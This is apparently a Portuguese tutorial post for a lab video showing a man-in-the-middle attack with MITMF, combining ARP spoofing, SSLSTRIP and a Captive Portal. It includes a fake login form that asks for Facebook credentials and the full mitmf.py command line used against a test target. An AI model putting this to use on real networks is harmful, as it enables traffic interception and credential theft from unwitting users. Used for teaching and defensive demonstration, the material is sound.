Usando MITMF com opções SSLSTRIP e Captive Portal

Neste vídeo, vamos experimentar uma variação do ataque man-in-the-middle com SSLSTRIP que executamos anteriormente. No MITMF, além de ARP spoofing e SSLSTRIP, também usaremos a opção Captive Portal. Revise os vídeos listados abaixo, se necessário:
Compartilhe

Neste vídeo, vamos experimentar uma variação do ataque man-in-the-middle com SSLSTRIP que executamos anteriormente.
No MITMF, além de ARP spoofing e SSLSTRIP, também usaremos a opção Captive Portal.
Revise os vídeos listados abaixo, se necessário:
Bettercap com ataque SSLSTRIP – Ainda funciona?
Ataques SSLSTRIP com Bettercap e MITMF – HSTS e navegadores da Web

Vimos nos vídeos anteriores que sites configurados corretamente para HSTS, não podem ser atacados usando SSLSTRIP. Por outro lado, neste momento, muitos sites ainda não usam HSTS ou têm o HSTS configurado incorretamente – o que os deixa vulneráveis ​​a ataques man-in-the-middle e SSLSTRIP.
Porque é improvável que um usuário navegue APENAS em sites HSTS configurados corretamente; um invasor pode redirecionar os sites vulneráveis ​​SSLSTRIP para um portal cativo e induzir o usuário a desistir de credenciais pertencentes a sites que não podem ser atacados diretamente (por exemplo: credenciais de mídia social, credenciais de e-mail etc.)

portal cativo

O teste Captive Portal no vídeo é muito básico, que usa dois arquivos no diretório /var/www/html/form1: index.html e welcome.php

index.html

<form action="welcome.php" method="post">
Please logon using your Facebook credentials in order to continue using our network:<br>
User: <input type="text" name="user"><br>
Password: <input type="text" name="pass"><br>
<input type="submit">
</form>
welcome.php
<html>
<body>
Enjoy tour browsing!
</body>
</html>

Um invasor em um cenário real tornaria a página da Web do Captive Portal mais sofisticada e convincente.

MITMF

O MITMF pode ser instalado a partir do repositório Kali Linux; mas para usar a opção Captive Portal, o MITMF deve ser instalado no GitHub – no seguinte local: https://github.com/byt3bl33d3r/MITMf

O seguinte comando MITMF foi usado para iniciar o ataque man-in-the-middle usando as opções ARP spoofing, SSLSTRIP e Captive Portal:

./mitmf.py -i eth0 –hsts –spoof –arp –dns –gateway 192.168.254.2 –targets 192.168.254.70 –captive –portalurl http://192.168.254.176/form1

Usando MITMF com opções SSLSTRIP e Captive Portal

https://www.youtube.com/watch?v=65Tw2qr-NYU